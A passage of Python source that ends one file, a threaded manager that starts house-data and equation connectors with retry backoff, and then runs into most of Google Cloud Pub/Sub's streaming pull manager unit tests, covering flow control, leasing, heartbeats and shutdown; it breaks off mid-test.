    as well.
    """

    def __init__(self, config):
        self.config = config
        # Number of parser worker threads per connector.
        self.workers = config.getint("IO", "number.of.workers", fallback=2)
        self.connector_list = []
        # Maps section name -> True once its connector was created successfully.
        self.active_sources = {}
        for section in config.sections():
            if section.startswith('HOUSE'):
                self.active_sources[section] = False
                threading.Thread(target=self.start_connector, args=(section,)).start()
        equation_parser = EquationParser(config)
        equation_list = equation_parser.read_all_equations()
        logger.debug("######### Equation list = " + str(equation_list))
        # Give the house connectors time to come up before wiring equations.
        # NOTE(review): this fixed 2-minute sleep blocks the caller; consider
        # waiting on `active_sources` instead.
        time.sleep(120)
        for meta_eq in equation_list:
            threading.Thread(target=self.start_equation, args=(meta_eq,)).start()

    def start_connector(self, section):
        """Create the connector for one house section, retrying with backoff."""
        repeat = 0
        wait_time = 600
        while not self.active_sources[section]:
            if repeat > 0:
                # Exponential backoff, capped at 6 hours between attempts.
                wait_time *= 2
                if wait_time > 6 * 60 * 60:
                    wait_time = 6 * 60 * 60
                logger.info("re-trying connection after " + str(wait_time) +
                            " sec for house " + str(section))
                time.sleep(wait_time)
            try:
                logger.info("House: " + section)
                rec_url = self.config.get(section, "con.url", fallback=None)
                rec_params = self.config.get(section, "con.topic", fallback=None)
                if rec_url:
                    connector = ApiConnectorFactory.get_api_connector(
                        section, rec_url, self.config, section)
                    self.connector_list.append(connector)
                    self.active_sources[section] = True
                elif rec_params:
                    rec_params = json.loads(rec_params)
                    connector = ParserConnector(rec_params, self.workers,
                                                self.config, section)
                    self.connector_list.append(connector)
                    self.active_sources[section] = True
                else:
                    # Neither a URL nor a topic configured: keep retrying.
                    self.active_sources[section] = False
            except Exception as e:
                logger.error(e)
            repeat += 1

    def start_equation(self, meta_eq):
        """Create the connector for one equation once all its sources are active."""
        repeat = 0
        wait_time = 60
        connector_started = False
        all_sources_declared = True
        while not connector_started and all_sources_declared:
            if repeat > 0:
                # Exponential backoff, capped at 1 hour between attempts.
                wait_time *= 2
                if wait_time > 60 * 60:
                    wait_time = 60 * 60
                logger.info("re-trying connection after " + str(wait_time) +
                            " sec for eq " + str(meta_eq["name"]))
                time.sleep(wait_time)
            try:
                all_sources_active = True
                for source in meta_eq["sources"]:
                    logger.debug("### sour " + str(source))
                    if source not in self.active_sources.keys():
                        # A source that is not configured at all can never
                        # become active: give up entirely.
                        all_sources_declared = False
                        logger.debug("##### house " + str(source) +
                                     " data not declared in config")
                        break
                    elif not self.active_sources[source]:
                        all_sources_active = False
                        logger.debug("##### house " + str(source) + " not active yet")
                if all_sources_declared and all_sources_active:
                    connector = EquationConnector(meta_eq, self.config)
                    self.connector_list.append(connector)
                    # Bug fix: the original never set this flag, so the loop
                    # retried forever and created duplicate EquationConnectors.
                    connector_started = True
            except Exception as e:
                logger.error(e)
            repeat += 1
test_streaming_pull_manager.py | # Copyright 2018, Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import functools
import logging
import threading
import time
import types as stdlib_types
import mock
import pytest
from google.api_core import bidi
from google.api_core import exceptions
from google.cloud.pubsub_v1 import types
from google.cloud.pubsub_v1.subscriber import client
from google.cloud.pubsub_v1.subscriber import message
from google.cloud.pubsub_v1.subscriber import scheduler
from google.cloud.pubsub_v1.subscriber._protocol import dispatcher
from google.cloud.pubsub_v1.subscriber._protocol import heartbeater
from google.cloud.pubsub_v1.subscriber._protocol import leaser
from google.cloud.pubsub_v1.subscriber._protocol import messages_on_hold
from google.cloud.pubsub_v1.subscriber._protocol import requests
from google.cloud.pubsub_v1.subscriber._protocol import streaming_pull_manager
from google.pubsub_v1 import types as gapic_types
import grpc
@pytest.mark.parametrize(
    "exception,expected_cls",
    [
        (ValueError("meep"), ValueError),
        (
            mock.create_autospec(grpc.RpcError, instance=True),
            exceptions.GoogleAPICallError,
        ),
        ({"error": "RPC terminated"}, Exception),
        ("something broke", Exception),
    ],
)
def test__wrap_as_exception(exception, expected_cls):
    """Each raw error value is wrapped into the expected exception class."""
    assert isinstance(
        streaming_pull_manager._wrap_as_exception(exception), expected_cls
    )
def test__wrap_callback_errors_no_error():
    """A callback that succeeds must not nack the message or report an error."""
    msg = mock.create_autospec(message.Message, instance=True)
    callback = mock.Mock()
    on_callback_error = mock.Mock()
    streaming_pull_manager._wrap_callback_errors(callback, on_callback_error, msg)
    callback.assert_called_once_with(msg)
    msg.nack.assert_not_called()
    on_callback_error.assert_not_called()
def test__wrap_callback_errors_error():
    """A raising callback must nack the message and forward the error."""
    callback_error = ValueError("meep")
    msg = mock.create_autospec(message.Message, instance=True)
    callback = mock.Mock(side_effect=callback_error)
    on_callback_error = mock.Mock()
    streaming_pull_manager._wrap_callback_errors(callback, on_callback_error, msg)
    msg.nack.assert_called_once()
    on_callback_error.assert_called_once_with(callback_error)
def test_constructor_and_default_state():
    """A freshly constructed manager is inactive with default-valued state."""
    manager = streaming_pull_manager.StreamingPullManager(
        mock.sentinel.client, mock.sentinel.subscription
    )
    # Public state
    assert manager.is_active is False
    assert manager.flow_control == types.FlowControl()
    assert manager.dispatcher is None
    assert manager.leaser is None
    assert manager.ack_histogram is not None
    assert manager.ack_deadline == 10
    assert manager.load == 0
    # Private state
    assert manager._client == mock.sentinel.client
    assert manager._subscription == mock.sentinel.subscription
    assert manager._scheduler is not None
    assert manager._messages_on_hold is not None
    assert manager._client_id is not None
def test_constructor_with_options():
    """Explicit flow_control and scheduler arguments are stored as given."""
    manager = streaming_pull_manager.StreamingPullManager(
        mock.sentinel.client,
        mock.sentinel.subscription,
        flow_control=mock.sentinel.flow_control,
        scheduler=mock.sentinel.scheduler,
    )
    assert manager.flow_control == mock.sentinel.flow_control
    assert manager._scheduler == mock.sentinel.scheduler
def make_manager(**kwargs):
    """Build a StreamingPullManager with autospecced client and scheduler."""
    client_ = mock.create_autospec(client.Client, instance=True)
    scheduler_ = mock.create_autospec(scheduler.Scheduler, instance=True)
    return streaming_pull_manager.StreamingPullManager(
        client_, "subscription-name", scheduler=scheduler_, **kwargs
    )
def fake_leaser_add(leaser, init_msg_count=0, assumed_msg_size=10):
    """Add a simplified fake add() method to a leaser instance.

    The fake add() method actually increases the leaser's internal message count
    by one for each message, and the total bytes by ``assumed_msg_size`` for
    each message (regardless of the actual message size).
    """

    def fake_add(self, items):
        self.message_count += len(items)
        self.bytes += len(items) * assumed_msg_size

    leaser.message_count = init_msg_count
    leaser.bytes = init_msg_count * assumed_msg_size
    # Bind as an instance method so `self` refers to the leaser mock.
    leaser.add = stdlib_types.MethodType(fake_add, leaser)
def test_ack_deadline():
    """The ack deadline reflects values added to the ack histogram."""
    manager = make_manager()
    assert manager.ack_deadline == 10
    manager.ack_histogram.add(20)
    assert manager.ack_deadline == 20
    manager.ack_histogram.add(10)
    # Adding a smaller value does not lower the deadline.
    assert manager.ack_deadline == 20
def test_client_id():
    """Each manager puts its own non-empty, unique client id in the request."""
    manager1 = make_manager()
    request1 = manager1._get_initial_request(stream_ack_deadline_seconds=10)
    client_id_1 = request1.client_id
    assert client_id_1
    manager2 = make_manager()
    request2 = manager2._get_initial_request(stream_ack_deadline_seconds=10)
    client_id_2 = request2.client_id
    assert client_id_2
    assert client_id_1 != client_id_2
def test_streaming_flow_control():
    """Flow-control limits are forwarded in the initial streaming request."""
    manager = make_manager(
        flow_control=types.FlowControl(max_messages=10, max_bytes=1000)
    )
    request = manager._get_initial_request(stream_ack_deadline_seconds=10)
    assert request.max_outstanding_messages == 10
    assert request.max_outstanding_bytes == 1000
def test_streaming_flow_control_use_legacy_flow_control():
    """With legacy flow control the server-side limits are zeroed out."""
    manager = make_manager(
        flow_control=types.FlowControl(max_messages=10, max_bytes=1000),
        use_legacy_flow_control=True,
    )
    request = manager._get_initial_request(stream_ack_deadline_seconds=10)
    assert request.max_outstanding_messages == 0
    assert request.max_outstanding_bytes == 0
def test_ack_deadline_with_max_duration_per_lease_extension():
    """max_duration_per_lease_extension caps the ack deadline regardless of
    the histogram contents."""
    manager = make_manager()
    manager._flow_control = types.FlowControl(max_duration_per_lease_extension=5)
    assert manager.ack_deadline == 5
    for _ in range(5):
        manager.ack_histogram.add(20)
    assert manager.ack_deadline == 5
def test_maybe_pause_consumer_wo_consumer_set():
    """maybe_pause_consumer() must not raise when no consumer exists yet."""
    manager = make_manager(
        flow_control=types.FlowControl(max_messages=10, max_bytes=1000)
    )
    manager.maybe_pause_consumer()  # no raise
    # Ensure load > 1
    _leaser = manager._leaser = mock.create_autospec(leaser.Leaser)
    _leaser.message_count = 100
    _leaser.bytes = 10000
    manager.maybe_pause_consumer()  # no raise
def test_lease_load_and_pause():
    """Load is the max of message/byte utilization; >1 pauses the consumer."""
    manager = make_manager(
        flow_control=types.FlowControl(max_messages=10, max_bytes=1000)
    )
    manager._leaser = leaser.Leaser(manager)
    manager._consumer = mock.create_autospec(bidi.BackgroundConsumer, instance=True)
    manager._consumer.is_paused = False
    # This should mean that our messages count is at 10%, and our bytes
    # are at 15%; load should return the higher (0.15), and shouldn't cause
    # the consumer to pause.
    manager.leaser.add(
        [requests.LeaseRequest(ack_id="one", byte_size=150, ordering_key="")]
    )
    assert manager.load == 0.15
    manager.maybe_pause_consumer()
    manager._consumer.pause.assert_not_called()
    # After this message is added, the messages should be higher at 20%
    # (versus 16% for bytes).
    manager.leaser.add(
        [requests.LeaseRequest(ack_id="two", byte_size=10, ordering_key="")]
    )
    assert manager.load == 0.2
    # Returning a number above 100% is fine, and it should cause this to pause.
    manager.leaser.add(
        [requests.LeaseRequest(ack_id="three", byte_size=1000, ordering_key="")]
    )
    assert manager.load == 1.16
    manager.maybe_pause_consumer()
    manager._consumer.pause.assert_called_once()
def test_drop_and_resume():
    """Dropping leased messages below the threshold resumes a paused consumer."""
    manager = make_manager(
        flow_control=types.FlowControl(max_messages=10, max_bytes=1000)
    )
    manager._leaser = leaser.Leaser(manager)
    manager._consumer = mock.create_autospec(bidi.BackgroundConsumer, instance=True)
    manager._consumer.is_paused = True
    # Add several messages until we're over the load threshold.
    manager.leaser.add(
        [
            requests.LeaseRequest(ack_id="one", byte_size=750, ordering_key=""),
            requests.LeaseRequest(ack_id="two", byte_size=250, ordering_key=""),
        ]
    )
    assert manager.load == 1.0
    # Trying to resume now should have no effect as we're over the threshold.
    manager.maybe_resume_consumer()
    manager._consumer.resume.assert_not_called()
    # Drop the 250 byte message, which should put us under the resume
    # threshold.
    manager.leaser.remove(
        [requests.DropRequest(ack_id="two", byte_size=250, ordering_key="")]
    )
    manager.maybe_resume_consumer()
    manager._consumer.resume.assert_called_once()
def test_resume_not_paused():
    """maybe_resume_consumer() is a no-op on an already-running consumer."""
    manager = make_manager()
    manager._consumer = mock.create_autospec(bidi.BackgroundConsumer, instance=True)
    manager._consumer.is_paused = False
    # Resuming should have no effect if the consumer is not actually paused.
    manager.maybe_resume_consumer()
    manager._consumer.resume.assert_not_called()
def test_maybe_resume_consumer_wo_consumer_set():
    """maybe_resume_consumer() must not raise when no consumer exists yet."""
    manager = make_manager(
        flow_control=types.FlowControl(max_messages=10, max_bytes=1000)
    )
    manager.maybe_resume_consumer()  # no raise
def test__maybe_release_messages_on_overload():
    """No held messages are released while the manager is at/over full load."""
    manager = make_manager(
        flow_control=types.FlowControl(max_messages=10, max_bytes=1000)
    )
    msg = mock.create_autospec(message.Message, instance=True, ack_id="ack", size=11)
    manager._messages_on_hold.put(msg)
    manager._on_hold_bytes = msg.size
    # Ensure load is exactly 1.0 (to verify that >= condition is used)
    _leaser = manager._leaser = mock.create_autospec(leaser.Leaser)
    _leaser.message_count = 10
    _leaser.bytes = 1000 + msg.size
    manager._maybe_release_messages()
    # The message stays on hold and nothing is leased or scheduled.
    assert manager._messages_on_hold.size == 1
    manager._leaser.add.assert_not_called()
    manager._scheduler.schedule.assert_not_called()
def test__maybe_release_messages_below_overload():
    """Held messages are released and scheduled only up to the max load."""
    manager = make_manager(
        flow_control=types.FlowControl(max_messages=10, max_bytes=1000)
    )
    manager._callback = mock.sentinel.callback
    # Init leaser message count to 11, so that when subtracting the 3 messages
    # that are on hold, there is still room for another 2 messages before the
    # max load is hit.
    _leaser = manager._leaser = mock.create_autospec(leaser.Leaser)
    fake_leaser_add(_leaser, init_msg_count=11, assumed_msg_size=10)
    messages = [
        mock.create_autospec(message.Message, instance=True, ack_id="ack_foo", size=10),
        mock.create_autospec(message.Message, instance=True, ack_id="ack_bar", size=10),
        mock.create_autospec(message.Message, instance=True, ack_id="ack_baz", size=10),
    ]
    for msg in messages:
        manager._messages_on_hold.put(msg)
    manager._on_hold_bytes = 3 * 10
    # the actual call of MUT
    manager._maybe_release_messages()
    # Only the first two messages fit; the third remains on hold.
    assert manager._messages_on_hold.size == 1
    msg = manager._messages_on_hold.get()
    assert msg.ack_id == "ack_baz"
    schedule_calls = manager._scheduler.schedule.mock_calls
    assert len(schedule_calls) == 2
    for _, call_args, _ in schedule_calls:
        assert call_args[0] == mock.sentinel.callback
        assert isinstance(call_args[1], message.Message)
        assert call_args[1].ack_id in ("ack_foo", "ack_bar")
def test__maybe_release_messages_negative_on_hold_bytes_warning(caplog):
    """A negative on-hold byte count logs a warning and is reset to zero."""
    manager = make_manager(
        flow_control=types.FlowControl(max_messages=10, max_bytes=1000)
    )
    msg = mock.create_autospec(message.Message, instance=True, ack_id="ack", size=17)
    manager._messages_on_hold.put(msg)
    manager._on_hold_bytes = 5  # too low for some reason
    _leaser = manager._leaser = mock.create_autospec(leaser.Leaser)
    _leaser.message_count = 3
    _leaser.bytes = 150
    with caplog.at_level(logging.WARNING):
        manager._maybe_release_messages()
    expected_warnings = [
        record.message.lower()
        for record in caplog.records
        if "unexpectedly negative" in record.message
    ]
    assert len(expected_warnings) == 1
    assert "on hold bytes" in expected_warnings[0]
    assert "-12" in expected_warnings[0]
    assert manager._on_hold_bytes == 0  # should be auto-corrected
def test_send_unary():
    """send() fans a StreamingPullRequest out into unary ack/modack calls,
    grouping modacks by their deadline."""
    manager = make_manager()
    manager.send(
        gapic_types.StreamingPullRequest(
            ack_ids=["ack_id1", "ack_id2"],
            modify_deadline_ack_ids=["ack_id3", "ack_id4", "ack_id5"],
            modify_deadline_seconds=[10, 20, 20],
        )
    )
    manager._client.acknowledge.assert_called_once_with(
        subscription=manager._subscription, ack_ids=["ack_id1", "ack_id2"]
    )
    manager._client.modify_ack_deadline.assert_has_calls(
        [
            mock.call(
                subscription=manager._subscription,
                ack_ids=["ack_id3"],
                ack_deadline_seconds=10,
            ),
            mock.call(
                subscription=manager._subscription,
                ack_ids=["ack_id4", "ack_id5"],
                ack_deadline_seconds=20,
            ),
        ],
        any_order=True,
    )
def test_send_unary_empty():
    """An empty request triggers no ack or modify_ack_deadline calls."""
    manager = make_manager()
    manager.send(gapic_types.StreamingPullRequest())
    manager._client.acknowledge.assert_not_called()
    manager._client.modify_ack_deadline.assert_not_called()
def test_send_unary_api_call_error(caplog):
    """A GoogleAPICallError from acknowledge is swallowed but logged."""
    caplog.set_level(logging.DEBUG)
    manager = make_manager()
    error = exceptions.GoogleAPICallError("The front fell off")
    manager._client.acknowledge.side_effect = error
    manager.send(gapic_types.StreamingPullRequest(ack_ids=["ack_id1", "ack_id2"]))
    assert "The front fell off" in caplog.text
def test_send_unary_retry_error(caplog):
    """A RetryError is re-raised, logged, and shuts the manager down."""
    caplog.set_level(logging.DEBUG)
    manager, _, _, _, _, _ = make_running_manager()
    error = exceptions.RetryError(
        "Too long a transient error", cause=Exception("Out of time!")
    )
    manager._client.acknowledge.side_effect = error
    with pytest.raises(exceptions.RetryError):
        manager.send(gapic_types.StreamingPullRequest(ack_ids=["ack_id1", "ack_id2"]))
    assert "RetryError while sending unary RPC" in caplog.text
    assert "signaled streaming pull manager shutdown" in caplog.text
def test_heartbeat():
    """heartbeat() sends an empty request over an active RPC and returns truthy."""
    manager = make_manager()
    manager._rpc = mock.create_autospec(bidi.BidiRpc, instance=True)
    manager._rpc.is_active = True
    result = manager.heartbeat()
    manager._rpc.send.assert_called_once_with(gapic_types.StreamingPullRequest())
    assert result
def test_heartbeat_inactive():
    """heartbeat() sends nothing and returns a falsy value when the RPC is inactive."""
    manager = make_manager()
    manager._rpc = mock.create_autospec(bidi.BidiRpc, instance=True)
    manager._rpc.is_active = False

    # Bug fix: capture the return value of heartbeat() itself. Previously the
    # result of ``assert_not_called()`` (which always returns None) was
    # assigned to ``result``, so the final ``assert not result`` passed
    # vacuously and heartbeat()'s return value was never actually checked.
    result = manager.heartbeat()

    manager._rpc.send.assert_not_called()
    assert not result
@mock.patch("google.api_core.bidi.ResumableBidiRpc", autospec=True)
@mock.patch("google.api_core.bidi.BackgroundConsumer", autospec=True)
@mock.patch("google.cloud.pubsub_v1.subscriber._protocol.leaser.Leaser", autospec=True)
@mock.patch(
    "google.cloud.pubsub_v1.subscriber._protocol.dispatcher.Dispatcher", autospec=True
)
@mock.patch(
    "google.cloud.pubsub_v1.subscriber._protocol.heartbeater.Heartbeater", autospec=True
)
def test_open(heartbeater, dispatcher, leaser, background_consumer, resumable_bidi_rpc):
    """open() creates, wires up and starts heartbeater, dispatcher, leaser,
    background consumer and the resumable streaming pull RPC."""
    manager = make_manager()
    manager.open(mock.sentinel.callback, mock.sentinel.on_callback_error)
    heartbeater.assert_called_once_with(manager)
    heartbeater.return_value.start.assert_called_once()
    assert manager._heartbeater == heartbeater.return_value
    dispatcher.assert_called_once_with(manager, manager._scheduler.queue)
    dispatcher.return_value.start.assert_called_once()
    assert manager._dispatcher == dispatcher.return_value
    leaser.assert_called_once_with(manager)
    leaser.return_value.start.assert_called_once()
    assert manager.leaser == leaser.return_value
    background_consumer.assert_called_once_with(manager._rpc, manager._on_response)
    background_consumer.return_value.start.assert_called_once()
    assert manager._consumer == background_consumer.return_value
    resumable_bidi_rpc.assert_called_once_with(
        start_rpc=manager._client.api.streaming_pull,
        initial_request=mock.ANY,
        should_recover=manager._should_recover,
        should_terminate=manager._should_terminate,
        throttle_reopen=True,
    )
    # The initial request is a lazily-evaluated partial bound to
    # _get_initial_request with the default stream ACK timeout.
    initial_request_arg = resumable_bidi_rpc.call_args.kwargs["initial_request"]
    assert initial_request_arg.func == manager._get_initial_request
    assert initial_request_arg.args[0] == 10  # the default stream ACK timeout
    assert not manager._client.api.get_subscription.called
    resumable_bidi_rpc.return_value.add_done_callback.assert_called_once_with(
        manager._on_rpc_done
    )
    assert manager._rpc == resumable_bidi_rpc.return_value
    # Flipping the consumer to active must make the whole manager active.
    manager._consumer.is_active = True
    assert manager.is_active is True
def test_open_already_active():
    """Opening a manager whose consumer is already running must fail."""
    manager = make_manager()
    consumer = mock.create_autospec(bidi.BackgroundConsumer, instance=True)
    consumer.is_active = True
    manager._consumer = consumer

    with pytest.raises(ValueError, match="already open"):
        manager.open(mock.sentinel.callback, mock.sentinel.on_callback_error)
def test_open_has_been_closed():
    """A manager that was closed once can never be reopened."""
    manager = make_manager()
    manager._closed = True

    callback = mock.sentinel.callback
    error_callback = mock.sentinel.on_callback_error
    with pytest.raises(ValueError, match="closed"):
        manager.open(callback, error_callback)
def make_running_manager(**kwargs):
    """Build a manager wired with autospec'd components, as if open() had run.

    Returns:
        Tuple of (manager, consumer, dispatcher, leaser, heartbeater,
        scheduler) for convenient unpacking in tests.
    """
    manager = make_manager(**kwargs)
    manager._consumer = mock.create_autospec(bidi.BackgroundConsumer, instance=True)
    manager._consumer.is_active = True
    manager._dispatcher = mock.create_autospec(dispatcher.Dispatcher, instance=True)
    manager._leaser = mock.create_autospec(leaser.Leaser, instance=True)
    manager._heartbeater = mock.create_autospec(heartbeater.Heartbeater, instance=True)
    return (
        manager,
        manager._consumer,
        manager._dispatcher,
        manager._leaser,
        manager._heartbeater,
        manager._scheduler,
    )
def test_close():
    """close() stops every component exactly once and leaves the manager inactive."""
    (
        manager,
        consumer,
        dispatcher,
        leaser,
        heartbeater,
        scheduler,
    ) = make_running_manager()
    manager.close()
    consumer.stop.assert_called_once()
    leaser.stop.assert_called_once()
    dispatcher.stop.assert_called_once()
    heartbeater.stop.assert_called_once()
    scheduler.shutdown.assert_called_once()
    assert manager.is_active is False
def test_close_inactive_consumer():
    """An already-inactive consumer is not stopped again; everything else is."""
    (
        manager,
        consumer,
        dispatcher,
        leaser,
        heartbeater,
        scheduler,
    ) = make_running_manager()
    consumer.is_active = False
    manager.close()
    # The consumer was never active, so stop() must be skipped for it only.
    consumer.stop.assert_not_called()
    leaser.stop.assert_called_once()
    dispatcher.stop.assert_called_once()
    heartbeater.stop.assert_called_once()
    scheduler.shutdown.assert_called_once()
def test_close_idempotent():
    """Calling close() repeatedly shuts components down only once."""
    manager, _, _, _, _, scheduler = make_running_manager()

    for _ in range(2):
        manager.close()

    assert scheduler.shutdown.call_count == 1
class FakeDispatcher(object):
    """Test double that hammers the manager's leaser from a background thread.

    Used to prove that close() does not race with concurrent dispatcher
    activity; any exception observed by the worker thread is reported via
    ``error_callback``.
    """
    def __init__(self, manager, error_callback):
        self._manager = manager
        self._error_callback = error_callback
        self._thread = None      # worker thread, created in start()
        self._stop = False       # cooperative shutdown flag checked by _do_work()
    def start(self):
        # Daemon thread so a hung worker never blocks test-process exit.
        self._thread = threading.Thread(target=self._do_work)
        self._thread.daemon = True
        self._thread.start()
    def stop(self):
        self._stop = True
        self._thread.join()
        self._thread = None
    def _do_work(self):
        # Keep poking the leaser until asked to stop.
        while not self._stop:
            try:
                self._manager.leaser.add([mock.Mock()])
            except Exception as exc:  # pragma: NO COVER
                self._error_callback(exc)
            time.sleep(0.1)
        # also try to interact with the leaser after the stop flag has been set
        try:
            self._manager.leaser.remove([mock.Mock()])
        except Exception as exc:  # pragma: NO COVER
            self._error_callback(exc)
def test_close_no_dispatcher_error():
    """Concurrent dispatcher activity while close() runs must not raise."""
    manager, _, _, _, _, _ = make_running_manager()
    error_callback = mock.Mock(name="error_callback")
    dispatcher = FakeDispatcher(manager=manager, error_callback=error_callback)
    manager._dispatcher = dispatcher
    dispatcher.start()
    manager.close()
    # The background worker must not have seen any exception.
    error_callback.assert_not_called()
def test_close_callbacks():
    """Registered close callbacks receive the manager and the close reason."""
    manager, *_ = make_running_manager()
    on_close = mock.Mock()
    manager.add_close_callback(on_close)

    manager.close(reason="meep")

    on_close.assert_called_once_with(manager, "meep")
def test_close_blocking_scheduler_shutdown():
    """With await_callbacks_on_shutdown=True, close() waits for message callbacks."""
    manager, _, _, _, _, _ = make_running_manager(await_callbacks_on_shutdown=True)
    scheduler = manager._scheduler
    manager.close()
    scheduler.shutdown.assert_called_once_with(await_msg_callbacks=True)
def test_close_nonblocking_scheduler_shutdown():
    """With await_callbacks_on_shutdown=False, close() does not wait for callbacks."""
    manager, _, _, _, _, _ = make_running_manager(await_callbacks_on_shutdown=False)
    scheduler = manager._scheduler
    manager.close()
    scheduler.shutdown.assert_called_once_with(await_msg_callbacks=False)
def test_close_nacks_internally_queued_messages():
    """Messages still held internally when close() runs must all be nacked."""
    nacked_messages = []
    # Record the data of any message that gets nacked.
    def fake_nack(self):
        nacked_messages.append(self.data)
    MockMsg = functools.partial(mock.create_autospec, message.Message, instance=True)
    messages = [MockMsg(data=b"msg1"), MockMsg(data=b"msg2"), MockMsg(data=b"msg3")]
    for msg in messages:
        msg.nack = stdlib_types.MethodType(fake_nack, msg)
    manager, _, _, _, _, _ = make_running_manager()
    # Two messages dropped by the scheduler, one still in the on-hold queue.
    dropped_by_scheduler = messages[:2]
    manager._scheduler.shutdown.return_value = dropped_by_scheduler
    manager._messages_on_hold._messages_on_hold.append(messages[2])
    manager.close()
    assert sorted(nacked_messages) == [b"msg1", b"msg2", b"msg3"]
def test__get_initial_request():
    """The initial stream request re-leases known ack IDs at the default deadline."""
    manager = make_manager()
    manager._leaser = mock.create_autospec(leaser.Leaser, instance=True)
    manager._leaser.ack_ids = ["1", "2"]
    initial_request = manager._get_initial_request(123)
    assert isinstance(initial_request, gapic_types.StreamingPullRequest)
    assert initial_request.subscription == "subscription-name"
    assert initial_request.stream_ack_deadline_seconds == 123
    # Each leased ack ID gets the (default) 10s modack deadline.
    assert initial_request.modify_deadline_ack_ids == ["1", "2"]
    assert initial_request.modify_deadline_seconds == [10, 10]
def test__get_initial_request_wo_leaser():
    """Without a leaser, the initial request carries no deadline modifications."""
    manager = make_manager()
    manager._leaser = None
    initial_request = manager._get_initial_request(123)
    assert isinstance(initial_request, gapic_types.StreamingPullRequest)
    assert initial_request.subscription == "subscription-name"
    assert initial_request.stream_ack_deadline_seconds == 123
    assert initial_request.modify_deadline_ack_ids == []
    assert initial_request.modify_deadline_seconds == []
def test__on_response_delivery_attempt():
    """The proto's delivery_attempt field surfaces on the wrapped Message."""
    manager, _, dispatcher, leaser, _, scheduler = make_running_manager()
    manager._callback = mock.sentinel.callback
    # Set up the messages.
    response = gapic_types.StreamingPullResponse(
        received_messages=[
            gapic_types.ReceivedMessage(
                ack_id="fack",
                message=gapic_types.PubsubMessage(data=b"foo", message_id="1"),
            ),
            gapic_types.ReceivedMessage(
                ack_id="back",
                message=gapic_types.PubsubMessage(data=b"bar", message_id="2"),
                delivery_attempt=6,
            ),
        ]
    )
    # adjust message bookkeeping in leaser
    fake_leaser_add(leaser, init_msg_count=0, assumed_msg_size=42)
    manager._on_response(response)
    schedule_calls = scheduler.schedule.mock_calls
    assert len(schedule_calls) == 2
    # An unset proto field (0) maps to None on the message wrapper.
    msg1 = schedule_calls[0][1][1]
    assert msg1.delivery_attempt is None
    msg2 = schedule_calls[1][1][1]
    assert msg2.delivery_attempt == 6
def test__on_response_no_leaser_overload():
    """Below the flow-control limit, all messages are modacked and scheduled."""
    manager, _, dispatcher, leaser, _, scheduler = make_running_manager()
    manager._callback = mock.sentinel.callback
    # Set up the messages.
    response = gapic_types.StreamingPullResponse(
        received_messages=[
            gapic_types.ReceivedMessage(
                ack_id="fack",
                message=gapic_types.PubsubMessage(data=b"foo", message_id="1"),
            ),
            gapic_types.ReceivedMessage(
                ack_id="back",
                message=gapic_types.PubsubMessage(data=b"bar", message_id="2"),
            ),
        ]
    )
    # adjust message bookkeeping in leaser
    fake_leaser_add(leaser, init_msg_count=0, assumed_msg_size=42)
    # Actually run the method and prove that modack and schedule
    # are called in the expected way.
    manager._on_response(response)
    dispatcher.modify_ack_deadline.assert_called_once_with(
        [requests.ModAckRequest("fack", 10), requests.ModAckRequest("back", 10)]
    )
    schedule_calls = scheduler.schedule.mock_calls
    assert len(schedule_calls) == 2
    for call in schedule_calls:
        assert call[1][0] == mock.sentinel.callback
        assert isinstance(call[1][1], message.Message)
    # the leaser load limit not hit, no messages had to be put on hold
    assert manager._messages_on_hold.size == 0
def test__on_response_with_leaser_overload():
    """Over the flow-control limit, extra messages are modacked but put on hold."""
    manager, _, dispatcher, leaser, _, scheduler = make_running_manager()
    manager._callback = mock.sentinel.callback
    # Set up the messages.
    response = gapic_types.StreamingPullResponse(
        received_messages=[
            gapic_types.ReceivedMessage(
                ack_id="fack",
                message=gapic_types.PubsubMessage(data=b"foo", message_id="1"),
            ),
            gapic_types.ReceivedMessage(
                ack_id="back",
                message=gapic_types.PubsubMessage(data=b"bar", message_id="2"),
            ),
            gapic_types.ReceivedMessage(
                ack_id="zack",
                message=gapic_types.PubsubMessage(data=b"baz", message_id="3"),
            ),
        ]
    )
    # Adjust message bookkeeping in leaser. Pick 999 messages, which is just below
    # the default FlowControl.max_messages limit.
    fake_leaser_add(leaser, init_msg_count=999, assumed_msg_size=10)
    # Actually run the method and prove that modack and schedule
    # are called in the expected way.
    manager._on_response(response)
    # all messages should be added to the lease management and have their ACK
    # deadline extended, even those not dispatched to callbacks
    dispatcher.modify_ack_deadline.assert_called_once_with(
        [
            requests.ModAckRequest("fack", 10),
            requests.ModAckRequest("back", 10),
            requests.ModAckRequest("zack", 10),
        ]
    )
    # one message should be scheduled, the flow control limits allow for it
    schedule_calls = scheduler.schedule.mock_calls
    assert len(schedule_calls) == 1
    call_args = schedule_calls[0][1]
    assert call_args[0] == mock.sentinel.callback
    assert isinstance(call_args[1], message.Message)
    assert call_args[1].message_id == "1"
    # the rest of the messages should have been put on hold
    assert manager._messages_on_hold.size == 2
    # Drain the on-hold queue and verify the held messages are 2 and 3.
    while True:
        msg = manager._messages_on_hold.get()
        if msg is None:
            break
        else:
            assert isinstance(msg, message.Message)
            assert msg.message_id in ("2", "3")
def test__on_response_none_data(caplog):
    """A None response is logged and never dispatched to the scheduler."""
    caplog.set_level(logging.DEBUG)
    manager, _, dispatcher, leaser, _, scheduler = make_running_manager()
    manager._callback = mock.sentinel.callback
    # adjust message bookkeeping in leaser
    fake_leaser_add(leaser, init_msg_count=0, assumed_msg_size=10)
    manager._on_response(response=None)
    scheduler.schedule.assert_not_called()
    assert "callback invoked with None" in caplog.text
def test__on_response_with_ordering_keys():
    """Messages sharing an ordering key are delivered one at a time, in order."""
    manager, _, dispatcher, leaser, _, scheduler = make_running_manager()
    manager._callback = mock.sentinel.callback
    # Set up the messages.
    response = gapic_types.StreamingPullResponse(
        received_messages=[
            gapic_types.ReceivedMessage(
                ack_id="fack",
                message=gapic_types.PubsubMessage(
                    data=b"foo", message_id="1", ordering_key=""
                ),
            ),
            gapic_types.ReceivedMessage(
                ack_id="back",
                message=gapic_types.PubsubMessage(
                    data=b"bar", message_id="2", ordering_key="key1"
                ),
            ),
            gapic_types.ReceivedMessage(
                ack_id="zack",
                message=gapic_types.PubsubMessage(
                    data=b"baz", message_id="3", ordering_key="key1"
                ),
